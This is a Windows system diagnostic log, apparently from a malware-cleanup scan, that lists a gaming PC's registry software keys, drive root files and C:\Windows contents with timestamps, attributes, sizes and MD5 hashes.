[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\BandiMPEG1]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\BANDISOFT]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\BattleGoat]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\BG_Caribbean]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\BitTorrent]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Blizzard Entertainment]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Bohemia Interactive]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Bohemia Interactive Studio]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Bugsplat]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\CD Projekt RED]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Cheat Engine]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Chromium]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Clients]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Clubic]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\DIALER]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Disc Soft]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\DownloadManager]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\DVDVideoSoft]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\EA Games]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Electronic Arts]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Fanlook]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Firaxis]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\FreeDownloadManager.ORG]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\g3n-h@ckm@n]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Gaijin]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\GameRanger]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\GameSpy]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\GOG.com]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Google]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\GTAGarage]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Haemimont Games]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\IM]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\IM Providers]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\IO Interactive]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\JavaSoft]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Jujubee S_A_]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Local AppWizard-Generated Applications]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Logic Artists]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Logitech]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Macromedia]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Malwarebytes]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Monold]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\MountAndBladeWarbandKeys]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\MountAndBladeWarbandWFASKeys]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Mozilla]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\MozillaPlugins]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Nero]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Netscape]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Obsidian Entertainment]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Obsidium]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\ocal AppWizard-Generated Applications]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\ODBC]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Opera Software]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\peaeLlz]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\PhotoFiltre 7]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Piriform]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\PlaysTV]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Policies]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Protect Software GmbH]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\QtProject]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Quadriga Games]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Raptr]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\RatioMaster.NET]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\RealNetworks]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Red Dot Games]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\SAMP]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\SecuROM]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Shutness]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\sixteen tons entertainment]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Skype]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\SmallGamesInfo]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Sysinternals]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\System Requirements Lab]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\techPowerUp]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\The Creative Assembly]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\TortoiseMerge]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\TortoiseSVN]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Trolltech]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Tunngle.net]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Ubisoft]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Unity]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Valve]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\WinRAR]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\WinRAR SFX]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Wow6432Node]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\ZebHelpProcess Helper]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\ZHP]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\AppDataLow\Software\JavaSoft]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\AppDataLow\Software\Microsoft]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\AppDataLow\Software\REBORN]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\AppDataLow\Software\Unity]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\DWM]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\Shell]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\TabletPC]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\Windows Error Reporting]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows NT\CurrentVersion]
[HKLM\Software\7-Zip]
[HKLM\Software\AdsFix]
[HKLM\Software\AGEIA Technologies]
[HKLM\Software\AMD]
[HKLM\Software\ATI]
[HKLM\Software\ATI Technologies]
[HKLM\Software\BandiMPEG1]
[HKLM\Software\Carnegie Mellon]
[HKLM\Software\Clients]
[HKLM\Software\g3n-h@ckm@n]
[HKLM\Software\Google]
[HKLM\Software\Huawei technologies]
[HKLM\Software\IM Providers]
[HKLM\Software\InstalledOptions]
[HKLM\Software\Intel]
[HKLM\Software\Khronos]
[HKLM\Software\Konami]
[HKLM\Software\Macromedia]
[HKLM\Software\Microsoft]
[HKLM\Software\Mozilla]
[HKLM\Software\MozillaPlugins]
[HKLM\Software\NVIDIA Corporation]
[HKLM\Software\ODBC]
[HKLM\Software\Piriform]
[HKLM\Software\Policies]
[HKLM\Software\Reason]
[HKLM\Software\RegisteredApplications]
[HKLM\Software\Sonic]
[HKLM\Software\SonicFocus]
[HKLM\Software\Sysinternals]
[HKLM\Software\TeamSpeak 3 Client]
[HKLM\Software\TortoiseOverlays]
[HKLM\Software\TortoiseSVN]
[HKLM\Software\v7slicldr]
[HKLM\Software\Wow6432Node]
[HKLM\Software\Microsoft\Windows\CurrentVersion]
[HKLM\Software\Microsoft\Windows\HTML Help]
[HKLM\Software\Microsoft\Windows\ITStorage]
[HKLM\Software\Microsoft\Windows\ScheduledDiagnostics]
[HKLM\Software\Microsoft\Windows\ScriptedDiagnosticsProvider]
[HKLM\Software\Microsoft\Windows\Tablet PC]
[HKLM\Software\Microsoft\Windows\TabletPC]
[HKLM\Software\Microsoft\Windows\Windows Error Reporting]
[HKLM\Software\Microsoft\Windows\Windows Search]
[HKLM\Software\Microsoft\Windows NT\CurrentVersion]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\AxInstSVGroup]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\defragsvc]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\LocalService]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\LocalServiceAndNoImpersonation]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\LocalServiceNetworkRestricted]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\LocalServiceNoNetwork]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\LocalSystemNetworkRestricted]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\netsvcs]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\NetworkService]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\NetworkServiceRemoteDesktopHyperVAgent]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\NetworkServiceRemoteDesktopPublishing]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\SDRSVC]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\swprv]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\termsvcs]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\utcsvc]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\wcssvc]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\wercplsupport]
[HKLM\Software\WOW6432Node\Adobe]
[HKLM\Software\WOW6432Node\AdwCleaner]
[HKLM\Software\WOW6432Node\AGEIA Technologies]
[HKLM\Software\WOW6432Node\Ahead]
[HKLM\Software\WOW6432Node\AMD]
[HKLM\Software\WOW6432Node\Analog Devices]
[HKLM\Software\WOW6432Node\ATI]
[HKLM\Software\WOW6432Node\ATI Technologies]
[HKLM\Software\WOW6432Node\AVAST Software]
[HKLM\Software\WOW6432Node\BandiMPEG1]
[HKLM\Software\WOW6432Node\BANDISOFT]
[HKLM\Software\WOW6432Node\battlegoat]
[HKLM\Software\WOW6432Node\Bethesda Softworks]
[HKLM\Software\WOW6432Node\Blizzard Entertainment]
[HKLM\Software\WOW6432Node\Bohemia Interactive]
[HKLM\Software\WOW6432Node\Bohemia Interactive Studio]
[HKLM\Software\WOW6432Node\Caphyon]
[HKLM\Software\WOW6432Node\CD Projekt RED]
[HKLM\Software\WOW6432Node\CDDB]
[HKLM\Software\WOW6432Node\DataCardNetconnect]
[HKLM\Software\WOW6432Node\DigitalWave]
[HKLM\Software\WOW6432Node\Disc Soft]
[HKLM\Software\WOW6432Node\DVDVideoSoft]
[HKLM\Software\WOW6432Node\EA Games]
[HKLM\Software\WOW6432Node\Eidos]
[HKLM\Software\WOW6432Node\Electronic Arts]
[HKLM\Software\WOW6432Node\Eversim]
[HKLM\Software\WOW6432Node\Fanlook]
[HKLM\Software\WOW6432Node\ForceBindIP]
[HKLM\Software\WOW6432Node\FreeArc]
[HKLM\Software\WOW6432Node\GOG.com]
[HKLM\Software\WOW6432Node\Google]
[HKLM\Software\WOW6432Node\Huawei technologies]
[HKLM\Software\WOW6432Node\IM Providers]
[HKLM\Software\WOW6432Node\InstallShield]
[HKLM\Software\WOW6432Node\Intel]
[HKLM\Software\WOW6432Node\Internet Download Manager]
[HKLM\Software\WOW6432Node\JavaSoft]
[HKLM\Software\WOW6432Node\jowood]
[HKLM\Software\WOW6432Node\JreMetrics]
[HKLM\Software\WOW6432Node\Kalypso]
[HKLM\Software\WOW6432Node\Khronos]
[HKLM\Software\WOW6432Node\Macromedia]
[HKLM\Software\WOW6432Node\Malwarebytes' Anti-Malware]
[HKLM\Software\WOW6432Node\Massive Entertainment AB]
[HKLM\Software\WOW6432Node\Microsoft]
[HKLM\Software\WOW6432Node\Monold]
[HKLM\Software\WOW6432Node\mount&blade warband]
[HKLM\Software\WOW6432Node\Mount&Blade With Fire and Sword]
[HKLM\Software\WOW6432Node\Mozilla]
[HKLM\Software\WOW6432Node\mozilla.org]
[HKLM\Software\WOW6432Node\MozillaPlugins]
[HKLM\Software\WOW6432Node\Mr DJ]
[HKLM\Software\WOW6432Node\Nero]
[HKLM\Software\WOW6432Node\NVIDIA Corporation]
[HKLM\Software\WOW6432Node\ODBC]
[HKLM\Software\WOW6432Node\OldTimer Tools]
[HKLM\Software\WOW6432Node\Opera Software]
[HKLM\Software\WOW6432Node\Paradox Interactive]
[HKLM\Software\WOW6432Node\Raptr]
[HKLM\Software\WOW6432Node\RealNetworks]
[HKLM\Software\WOW6432Node\Riot Games]
[HKLM\Software\WOW6432Node\Rockstar Games]
[HKLM\Software\WOW6432Node\SCRiN]
[HKLM\Software\WOW6432Node\SEGA]
[HKLM\Software\WOW6432Node\Shutness]
[HKLM\Software\WOW6432Node\Sims]
[HKLM\Software\WOW6432Node\sixteen tons entertainment]
[HKLM\Software\WOW6432Node\Skype]
[HKLM\Software\WOW6432Node\THQ]
[HKLM\Software\WOW6432Node\TortoiseOverlays]
[HKLM\Software\WOW6432Node\TortoiseSVN]
[HKLM\Software\WOW6432Node\Tunngle.net]
[HKLM\Software\WOW6432Node\Ubisoft]
[HKLM\Software\WOW6432Node\Valve]
[HKLM\Software\WOW6432Node\VideoLAN]
[HKLM\Software\WOW6432Node\VUGames]
[HKLM\Software\WOW6432Node\WinRAR]
[HKLM\Software\WOW6432Node\WizardWorks]
[HKLM\Software\WOW6432Node\Xing Technology Corp.]
[HKLM\Software\WOW6432Node\Clients]
[HKLM\Software\WOW6432Node\Policies]
[HKLM\Software\WOW6432Node\RegisteredApplications]
[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion]
[HKLM\Software\WOW6432Node\Microsoft\Windows\Help]
[HKLM\Software\WOW6432Node\Microsoft\Windows\HTML Help]
[HKLM\Software\WOW6432Node\Microsoft\Windows\ITStorage]
[HKLM\Software\WOW6432Node\Microsoft\Windows\ScriptedDiagnosticsProvider]
[HKLM\Software\WOW6432Node\Microsoft\Windows\Windows Error Reporting]
[HKLM\Software\WOW6432Node\Microsoft\Windows\Windows Search]
[HKLM\Software\WOW6432Node\Microsoft\Windows\Tablet PC]
[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion]
[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SvcHost\LocalService]
[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SvcHost\LocalServiceAndNoImpersonation]
[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SvcHost\LocalServiceNetworkRestricted]
[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SvcHost\LocalServiceNoNetwork]
[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SvcHost\LocalSystemNetworkRestricted]
[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SvcHost\netsvcs]
[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SvcHost\NetworkService]
[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SvcHost\NetworkServiceRemoteDesktopHyperVAgent]
[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SvcHost\NetworkServiceRemoteDesktopPublishing]
[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SvcHost\termsvcs]
[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SvcHost\wcssvc]

---------- | Drives


D:

[01/12/2006 22:37:14] - |A| - (.© Microsoft Corporation. - Microsoft® Debug Information Accessor.) - [904704] - (8.0.50727.762) - D:\msdia80.dll
[11/01/2015 15:01:09] - |A| - (.Copyright (C) 2009, Aru <oneforaru at gmail.com> - GTAIV ScriptHook.) - [212480] - (0.2.5.0) - D:\ScriptHook.dll
[23/02/2015 21:24:43] - |A| - (.-.) - [241664] - (0.0.0.0) - D:\steam_api.dll
[22/11/2014 21:27:53] - |A| - (.Copyright (C) 2006 - 2013 Alcpu - CPU temperature and system information utility.) - [794272] - (1.0.6.0) - D:\Core Temp.exe
[10/11/2015 17:47:30] - |A| - (.-.) - [241664] - (0.0.0.0) - D:\IMGTool.exe
[16/11/2014 21:52:50] - |A| - (.Copyright © 1996-2005 Macromedia, Inc. - Macromedia Flash Player 8.0  r22.) - [1746448] - (8.0.22.0) - D:\quranflash tajweed.exe
[21/11/2014 11:29:40] - |A| - (.Adobe® Flash® Player. Copyright © 1996-2007 Adobe Systems Incorporated. Protected by U.S. Patent 6,879,327; Patents Pending in the United States and other countries. Adobe and Flash are either trademarks or registered trademarks in the United States and/or other countries. - Adobe Flash Player 9.0  r115.) - [3562218] - (9.0.115.0) - D:\Quranflash Warsh.exe
[21/11/2014 15:17:50] - |A| - (.-.) - [1612] - (0.0.0.0) - D:\ALI213.ini
[22/11/2014 21:28:05] - |A| - (.-.) - [1275] - (0.0.0.0) - D:\CoreTemp.ini
[23/01/2016 13:59:59] - |A| - (.-.) - [2940] - (0.0.0.0) - D:\SkyrimPrefs.ini

G:

[16/06/2013 11:01:19] - |R| - (.                                                                                                   - Patrician IV Gold Edition                                .) - [441840] - (0.0.0.0) - G:\setup.exe
[09/01/2013 12:47:07] - |R| - (.-.) - [40] - (0.0.0.0) - G:\autorun.inf

---------- | C:

[13/07/2017 21:04:41] - |SHD| - [129] - C:\$RECYCLE.BIN
[13/07/2017 15:51:00] - |D| - [394897324] - C:\AdsFix
[MD5.7348D46945F3B1789CDB90C8D761EF9A] - [13/07/2017 15:57:15] - |A| - (.-.) - [28543] - (0.0.0.0) - C:\AdsFix_13_07_2017_21_02_57.txt
[31/01/2015 10:39:14] - |D| - [733559383] - C:\AdwCleaner
[05/07/2015 20:44:31] - |D| - [1036257798] - C:\AMD
[14/07/2009 05:08:56] - |SHD| - [0] - C:\Documents and Settings
[27/06/2017 20:52:03] - |D| - [357699484] - C:\Games
[28/11/2015 15:29:16] - |D| - [7196943605] - C:\GOG Games
[MD5.80C44798E4529BD6FC159CFF30572474] - [03/04/2016 14:33:35] - |A| - (.-.) - [1803] - (0.0.0.0) - C:\Google Chrome.lnk
[MD5.D41D8CD98F00B204E9800998ECF8427E] - [13/07/2017 21:02:58] - |ASH| - (.-.) - [9661739008] - (0.0.0.0) - C:\hiberfil.sys
[02/01/2017 20:44:55] - |D| - [0] - C:\IExp0.tmp
[02/01/2017 20:45:06] - |D| - [0] - C:\IExp1.tmp
[17/11/2016 23:07:50] - |D| - [0] - C:\Monold
[07/11/2014 11:44:35] - |RHD| - [529670008] - C:\MSOCache
[MD5.D41D8CD98F00B204E9800998ECF8427E] - [25/06/2017 13:25:20] - |ASH| - (.-.) - [12882321408] - (0.0.0.0) - C:\pagefile.sys
[14/07/2009 03:20:08] - |D| - [0] - C:\PerfLogs
[MD5.1E780F42227B13BB2BC6CDDE7AAF5B31] - [31/01/2015 08:56:19] - |A| - (.-.) - [512] - (0.0.0.0) - C:\PhysicalDisk0_MBR.bin
[MD5.1E780F42227B13BB2BC6CDDE7AAF5B31] - [31/01/2015 17:47:56] - |A| - (.-.) - [512] - (0.0.0.0) - C:\PhysicalMBR.bin
[14/07/2009 03:20:08] - |RD| - [12566153943] - C:\Program Files
[14/07/2009 03:20:08] - |RD| - [169615415477] - C:\Program Files (x86)
[14/07/2009 03:20:08] - |HD| - [5013210826] - C:\ProgramData
[13/07/2017 21:59:08] - |D| - [262057] - C:\QuickDiag
[MD5.7CA227A809F7710DC47AE21060D682CC] - [13/07/2017 22:13:45] - |A| - (.-.) - [148936] - (0.0.0.0) - C:\QuickDiag.txt
[07/11/2014 11:06:39] - |SHD| - [173149008] - C:\Recovery
[MD5.547F4B955401C6F9584267A96E55A296] - [28/02/2017 22:03:17] - |A| - (.                                                                                                   - Setup Setup                                              .) - [1353286] - (21.0.0.5) - C:\s460..exe
[07/11/2014 10:49:39] - |SHD| - [0] - C:\System Volume Information
[27/02/2015 19:11:23] - |D| - [0] - C:\TA2DST
[14/07/2009 03:20:08] - |RD| - [131355730470] - C:\Users
[14/07/2009 03:20:08] - |D| - [27298013564] - C:\Windows
[MD5.21F74ED27273E01D1171EC098827A471] - [09/04/2016 11:38:53] - |A| - (.-.) - [36872] - (0.0.0.0) - C:\zoek-results.log
[09/04/2016 11:37:59] - |D| - [8766010400] - C:\zoek_backup
[01/02/2015 10:24:01] - |D| - [1302300] - C:\_OTL

---------- | C:\Windows

[14/07/2009 05:32:38] - |D| - [802] - C:\Windows\addins
[14/07/2009 03:20:08] - |D| - [69120] - C:\Windows\AppCompat
[14/07/2009 03:20:08] - |D| - [10977854] - C:\Windows\AppPatch
[14/07/2009 03:20:08] - |RSD| - [1476913832] - C:\Windows\assembly
[MD5.3BF741BDEAF1E0824A4E3C79936091B4] - [07/11/2014 11:26:40] - |A| - (.-.) - [47164] - (0.0.0.0) - C:\Windows\atiogl.xml
[MD5.D41D8CD98F00B204E9800998ECF8427E] - [07/11/2014 11:32:13] - |A| - (.-.) - [0] - (0.0.0.0) - C:\Windows\ativpsrm.bin
[MD5.8C03632683240299412307341773B3DE] - [07/11/2014 11:59:20] - |A| - (.-.) - [41664] - (0.0.0.0) - C:\Windows\avastSS.scr
[28/02/2017 21:42:54] - |D| - [0] - C:\Windows\Azart
[MD5.317CD1CE327B6520BF4EE007BCD39E61] - [20/01/2017 21:33:15] - |A| - (.© Microsoft Corporation. Tous droits réservés. - Utilitaire de service de fichier de démarrage.) - [71168] - (6.1.7601.17514) - C:\Windows\bfsvc.exe
[14/07/2009 03:20:09] - |D| - [29088878] - C:\Windows\Boot
[MD5.75BECE17A94166C94133D9617C5A233B] - [14/07/2009 05:38:36] - |AS| - (.-.) - [67584] - (0.0.0.0) - C:\Windows\bootstat.dat
[14/07/2009 03:20:09] - |D| - [3233280] - C:\Windows\Branding
[14/07/2009 15:35:29] - |D| - [0] - C:\Windows\CSC
[14/07/2009 03:20:09] - |D| - [2113488] - C:\Windows\Cursors
[14/07/2009 04:45:54] - |D| - [34063] - C:\Windows\debug
[14/07/2009 05:32:38] - |D| - [3330461] - C:\Windows\diagnostics
[14/07/2009 05:37:46] - |D| - [0] - C:\Windows\DigitalLocker
[MD5.A255EBF5BF9B4E95F92A7A10B2977024] - [09/04/2015 09:35:57] - |A| - (.-.) - [409505] - (0.0.0.0) - C:\Windows\DirectX.log
[14/07/2009 05:32:38] - |D| - [65] - C:\Windows\Downloaded Program Files
[MD5.BD7AC0F5BFCC7199BAC277AE03B4DAD7] - [07/05/2015 12:08:30] - |A| - (.Copyright (c) Microsoft Corporation. - dxsdkuninst.exe.) - [119120] - (9.25.1476.0) - C:\Windows\dxsdkuninst.exe
[14/07/2009 15:35:30] - |D| - [118084593] - C:\Windows\ehome
[14/07/2009 05:37:46] - |D| - [0] - C:\Windows\en-US
[MD5.AC4C51EB24AA95B77F705AB159189E24] - [20/01/2017 21:34:43] - |A| - (.© Microsoft Corporation. Tous droits réservés. - Explorateur Windows.) - [2872320] - (6.1.7601.17514) - C:\Windows\explorer.exe
[14/07/2009 03:20:09] - |RSD| - [403630907] - C:\Windows\Fonts
[14/07/2009 15:24:08] - |D| - [142336] - C:\Windows\fr-FR
[MD5.92BB2E9AA28542C685C59EFCBAC2490B] - [13/07/2009 23:22:13] - |A| - (.© Microsoft Corporation. Tous droits réservés. - Utilitaire de service de chiffrement de lecteur BitLocker.) - [15360] - (6.1.7600.16385) - C:\Windows\fveupdate.exe
[14/07/2009 03:20:09] - |D| - [17807100] - C:\Windows\Globalization
[14/07/2009 03:20:09] - |D| - [41044615] - C:\Windows\Help
[MD5.CD47548A52B02D254BF6D7F7A5F2BFD3] - [14/07/2009 00:29:53] - |A| - (.© Microsoft Corporation. Tous droits réservés. - Aide et support Microsoft.) - [733696] - (6.1.7600.16385) - C:\Windows\HelpPane.exe
[MD5.3D0B9EA79BF1F828324447D84AA9DCE2] - [14/07/2009 00:29:03] - |A| - (.© Microsoft Corporation. Tous droits réservés. - Exécutable de l’aide HTML Microsoft®.) - [16896] - (6.1.7600.16385) - C:\Windows\hh.exe
[14/07/2009 03:20:09] - |D| - [143547244] - C:\Windows\IME
[14/07/2009 03:20:10] - |D| - [146210392] - C:\Windows\inf
[07/11/2014 11:39:32] - |SHD| - [3820496130] - C:\Windows\Installer
[14/07/2009 03:20:10] - |D| - [48371] - C:\Windows\L2Schemas
[14/07/2009 03:20:10] - |D| - [1287759] - C:\Windows\LiveKernelReports
[14/07/2009 03:20:10] - |D| - [100594130] - C:\Windows\Logs
[14/07/2009 03:20:10] - |RSD| - [13327133] - C:\Windows\Media
[MD5.23AF90D2355D8C83AA4567EF1763B467] - [14/07/2009 00:10:29] - |A| - (.-.) - [43131] - (0.0.0.0) - C:\Windows\mib.bin
[14/07/2009 03:20:10] - |D| - [1239689184] - C:\Windows\Microsoft.NET
[08/02/2015 22:23:02] - |D| - [1496] - C:\Windows\Migration
[21/11/2014 15:11:09] - |D| - [7222800] - C:\Windows\Minidump
[14/07/2009 03:20:10] - |D| - [78190] - C:\Windows\ModemLogs
[MD5.B9FB94A8DA62711C6955825DEFB25C5A] - [14/07/2009 02:35:42] - |A| - (.-.) - [1405] - (0.0.0.0) - C:\Windows\msdfmap.ini
[02/01/2017 20:44:53] - |HD| - [0] - C:\Windows\msdownld.tmp
[MD5.C7BC96C3711C0D269DA26D1F0ECEC547] - [23/01/2016 17:04:43] - |A| - (.-.) - [69] - (0.0.0.0) - C:\Windows\NeroDigital.ini
[MD5.CD65815D8F7A042BA0C7FB6CE6F563BF] - [17/02/2017 19:23:20] - |A| - (.-.) - [1447] - (0.0.0.0) - C:\Windows\NLSDownlevelMapping.log
[MD5.B32189BDFF6E577A92BAA61AD49264E6] - [21/01/2017 13:14:58] - |A| - (.© Microsoft Corporation. Tous droits réservés. - Bloc-notes.) - [193536] - (6.1.7601.18917) - C:\Windows\notepad.exe
[14/07/2009 05:32:38] - |D| - [65] - C:\Windows\Offline Web Pages
[07/11/2014 10:49:02] - |D| - [945348] - C:\Windows\Panther
[07/11/2014 11:47:17] - |D| - [0] - C:\Windows\PCHEALTH
[14/07/2009 05:32:38] - |D| - [62961632] - C:\Windows\Performance
[MD5.781CFB833C3F1BCDE055F46C65393BF3] - [19/02/2015 16:11:24] - |A| - (.-.) - [23196] - (0.0.0.0) - C:\Windows\PFRO.log
[14/07/2009 03:20:10] - |D| - [1132015] - C:\Windows\PLA
[14/07/2009 03:20:10] - |D| - [6838029] - C:\Windows\PolicyDefinitions
[07/11/2014 10:50:20] - |D| - [44888314] - C:\Windows\Prefetch
[MD5.FFB8B91BD19E5BC10A3344AAF34880F3] - [14/07/2009 15:36:13] - |A| - (.-.) - [53551] - (0.0.0.0) - C:\Windows\Professional.xml
[MD5.2E2C937846A0B8789E5E91739284D17A] - [13/07/2009 23:27:10] - |A| - (.© Microsoft Corporation. Tous droits réservés. - Éditeur du Registre.) - [427008] - (6.1.7600.16385) - C:\Windows\regedit.exe
[02/01/2017 20:44:55] - |D| - [0] - C:\Windows\RegisteredPackages
[14/07/2009 03:20:10] - |D| - [22588] - C:\Windows\registration
[14/07/2009 03:20:10] - |D| - [1674534] - C:\Windows\Resources
[14/07/2009 03:20:10] - |D| - [0] - C:\Windows\SchCache
[14/07/2009 03:20:10] - |D| - [55533] - C:\Windows\schemas
[14/07/2009 03:20:10] - |D| - [1070608] - C:\Windows\security
[14/07/2009 04:45:47] - |D| - [82952799] - C:\Windows\ServiceProfiles
